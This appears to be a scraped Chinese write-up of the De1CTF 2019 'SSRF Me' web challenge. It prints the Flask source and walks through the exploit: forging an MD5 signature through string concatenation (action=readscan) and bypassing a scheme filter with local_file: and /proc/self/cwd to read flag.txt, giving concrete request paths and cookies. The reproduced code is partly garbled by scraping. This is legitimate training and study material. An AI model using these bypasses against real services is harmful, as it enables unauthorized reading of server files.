WEB|[De1CTF 2019]SSRF Me
Posted scarecr0w7
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了WEB|[De1CTF 2019]SSRF Me相关的知识,希望对你有一定的参考价值。
页面代码为python代码,题目提示为SSRF,并且flag is in ./flag.txt
格式化代码
#! /usr/bin/env python
# #encoding=utf-8
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json
reload(sys)
sys.setdefaultencoding(\'latin1\')
app = Flask(__name__)
secert_key = os.urandom(16)
class Task:
def __init__(self, action, param, sign, ip):
self.action = action
self.param = param
self.sign = sign
self.sandbox = md5(ip)
if (not os.path.exists(self.sandbox)):
# SandBox For Remote_Addr os.mkdir(self.sandbox)
def Exec(self):
result =
result[\'code\'] = 500
if (self.checkSign()):
if "scan" in self.action:
tmpfile = open("./%s/result.txt" % self.sandbox, \'w\')
resp = scan(self.param)
if (resp == "Connection Timeout"):
result[\'data\'] = resp
else:
print(resp)
tmpfile.write(resp)
tmpfile.close()
result[\'code\'] = 200
if "read" in self.action:
f = open("./%s/result.txt" % self.sandbox, \'r\')
result[\'code\'] = 200
result[\'data\'] = f.read()
if result[\'code\'] == 500:
result[\'data\'] = "Action Error"
else:
result[\'code\'] = 500
result[\'msg\'] = "Sign Error"
return result
def checkSign(self):
if (getSign(self.action, self.param) == self.sign):
return True
else:
return False
# generate Sign For Action Scan.
#
@app.route("/geneSign", methods=[\'GET\', \'POST\'])
def geneSign():
param = urllib.unquote(request.args.get("param", ""))
action = "scan"
return getSign(action, param)
@app.route(\'/De1ta\', methods=[\'GET\', \'POST\'])
def challenge():
action = urllib.unquote(request.cookies.get("action"))
param = urllib.unquote(request.args.get("param", ""))
sign = urllib.unquote(request.cookies.get("sign"))
ip = request.remote_addr
if (waf(param)):
return "No Hacker!!!!"
task = Task(action, param, sign, ip)
return json.dumps(task.Exec())
@app.route(\'/\')
def index():
return open("code.txt", "r").read()
def scan(param):
socket.setdefaulttimeout(1)
try:
return urllib.urlopen(param).read()[:50]
except:
return "Connection Timeout"
def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest()
def md5(content):
return hashlib.md5(content).hexdigest()
def waf(param):
check = param.strip().lower()
if check.startswith("gopher") or check.startswith("file"):
return True
else:
return False
if __name__ == \'__main__\':
app.debug = False
app.run(host=\'0.0.0.0\', port=80)
代码审计
代码中有三个路由
@app.route(\'/\'),读取本地code.txt文件
@app.route("/geneSign", methods=[\'GET\', \'POST\']),根据param、action和secert_key参数调用getSign()方法计算出一个值sign
@app.route(\'/De1ta\', methods=[\'GET\', \'POST\']),获取action、param、sign和ip参数调用Task.Exec方法,扫描本地并返回结果,可以利用这里读取flag.txt文件然后输出
@app.route(\'/De1ta\', methods=[\'GET\', \'POST\'])
def challenge():
action = urllib.unquote(request.cookies.get("action"))
param = urllib.unquote(request.args.get("param", ""))
sign = urllib.unquote(request.cookies.get("sign"))
ip = request.remote_addr
if (waf(param)):
return "No Hacker!!!!"
task = Task(action, param, sign, ip)
return json.dumps(task.Exec())
访问/De1ta路径,传入cookies中action和sign,get方法中传入param,调用waf()函数
def waf(param):
check = param.strip().lower()
if check.startswith("gopher") or check.startswith("file"):
return True
else:
return False
waf()函数将param参数值转换为小写,判断是否以gopher或file字符串开头,这里需要返回Ture,调用task.Exec()
def Exec(self):
result =
result[\'code\'] = 500
if (self.checkSign()):
......
def checkSign(self):
if (getSign(self.action, self.param) == self.sign):
return True
else:
return False
task.Exec()中判断传入的Sign是否与getSign()计算出的Sign值相同
if "scan" in self.action:
tmpfile = open("./%s/result.txt" % self.sandbox, \'w\')
resp = scan(self.param)
if (resp == "Connection Timeout"):
result[\'data\'] = resp
else:
print(resp)
tmpfile.write(resp)
tmpfile.close()
result[\'code\'] = 200
相同则,判断scan是否在action中,在则scan文件param,结果不为Connection Timeout则输出结果
所以这里需要解决的就是传入Sign值与计算的Sign值相同,并且param不以gopher或file字符串开头,action含有scan字符串。因为这里给出了Sign计算路径,且action判断用的是in,所以很好绕过,只要action含有scan字符串就行
if "scan" in self.action:
思路
访问/geneSign,param参数为flag.txtread,获取Sign
获取Sign:65f37c68d5eb8a857159d661f1817a15
Sign = secert_key + flag.txtread + scan
访问/De1ta,param参数为flag.txt,添加Cookie为action=readscan;sign=65f37c68d5eb8a857159d661f1817a15,sign为刚刚计算出的值
Sign = secert_key + flag.txt + readscan
flag0eea8996-266f-4d36-970d-2e5406aba2e7
方法二:文件包含
使用urllib.urlopen(param) 包含文件,可以直接填写文件路径./flag.txt,也可以使用伪协议file:///app/flag.txt ,但是waf()禁止以file开头,可以使用local_file,使用local_file时需要注意,路径必需为绝对路径,可以使用/proc/self/cwd/代表当前路径
def waf(param):
check = param.strip().lower()
if check.startswith("gopher") or check.startswith("file"):
return True
else:
return False
获取Sign
# file:///app/flag.txt
# local_file:flag.txt
# local-file:///proc/self/cwd/flag.txt
/geneSign?param=local_file:flag.txtread
627888ff16803e4bbc91c5f8113c8f9e
获取flag
/De1ta?param=local_file:flag.txt
cookie: action=readscan;sign=627888ff16803e4bbc91c5f8113c8f9e
[De1CTF 2019]SSRF Me
看了好久的wp才做出来的一道题目,感觉自己太菜了。
给出源码(加了几条注释)
#! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding(‘latin1‘) app = Flask(__name__) secert_key = os.urandom(16) class Task: def __init__(self, action, param, sign, ip): #构造方法self代表对象,其他是对象的属性 self.action = action self.param = param self.sign = sign self.sandbox = md5(ip) if(not os.path.exists(self.sandbox)): #SandBox For Remote_Addr os.mkdir(self.sandbox) def Exec(self): result = {} result[‘code‘] = 500 if (self.checkSign()): if "scan" in self.action: tmpfile = open("./%s/result.txt" % self.sandbox, ‘w‘) resp = scan(self.param) if (resp == "Connection Timeout"): result[‘data‘] = resp else: print resp tmpfile.write(resp) tmpfile.close() result[‘code‘] = 200 if "read" in self.action: f = open("./%s/result.txt" % self.sandbox, ‘r‘) result[‘code‘] = 200 result[‘data‘] = f.read() if result[‘code‘] == 500: result[‘data‘] = "Action Error" else: result[‘code‘] = 500 result[‘msg‘] = "Sign Error" return result def checkSign(self): if (getSign(self.action, self.param) == self.sign): return True else: return False #generate Sign For Action Scan. @app.route("/geneSign", methods=[‘GET‘, ‘POST‘]) def geneSign(): param = urllib.unquote(request.args.get("param", "")) action = "scan" return getSign(action, param) @app.route(‘/De1ta‘,methods=[‘GET‘,‘POST‘]) def challenge(): action = urllib.unquote(request.cookies.get("action")) #提取cookie信息中的,名为action得对应值 param = urllib.unquote(request.args.get("param", "")) #提取get方法传入的,参数名叫param对应得值 sign = urllib.unquote(request.cookies.get("sign")) #70-72 将url编码解码 ip = request.remote_addr if(waf(param)): return "No Hacker!!!!" task = Task(action, param, sign, ip) return json.dumps(task.Exec()) #Python 对象编码成 JSON 字符串 @app.route(‘/‘) def index(): return open("code.txt","r").read() def scan(param): socket.setdefaulttimeout(1) try: return urllib.urlopen(param).read()[:50] #读取网络文件参数可以是url except: return "Connection Timeout" def getSign(action, param): return hashlib.md5(secert_key + param + action).hexdigest() #hashlib.md5()#获取一个md5加密算法对象,hexdigest()是获得加密吼的16进制字符串 def md5(content): return hashlib.md5(content).hexdigest() def waf(param): check=param.strip().lower() if check.startswith("gopher") or check.startswith("file"): return True else: return False if __name__ == ‘__main__‘: app.debug = False app.run(host=‘0.0.0.0‘)
字符串拼接
访问 /geneSign?param=flag.txt 得到
看到 getSign 处的凭拼接
def getSign(action, param): return hashlib.md5(secert_key + param + action).hexdigest() #hashlib.md5()#获取一个md5加密算法对象,hexdigest()是获得加密吼的16进制字符串
如果 secert_key 为 x,则访问 /geneSign?param=flag.txt 时,返回的md5为 md5(‘xxx‘ + ‘flag.txt‘ + ‘scan‘) ,相当于 md5(xxxflag.txtscan)
于是构造 /geneSign?param=flag.txtread 得到 等价于 md5(‘readflag.txtreadscan‘)的md5
bp 抓包后 构造 Cookie 得到
参考了:https://xz.aliyun.com/t/5927;https://joychou.org/web/hash-length-extension-attack.html
大佬们的文章。
以上是关于WEB|[De1CTF 2019]SSRF Me的主要内容,如果未能解决你的问题,请参考以下文章
刷题记录:[De1CTF 2019]Giftbox && Comment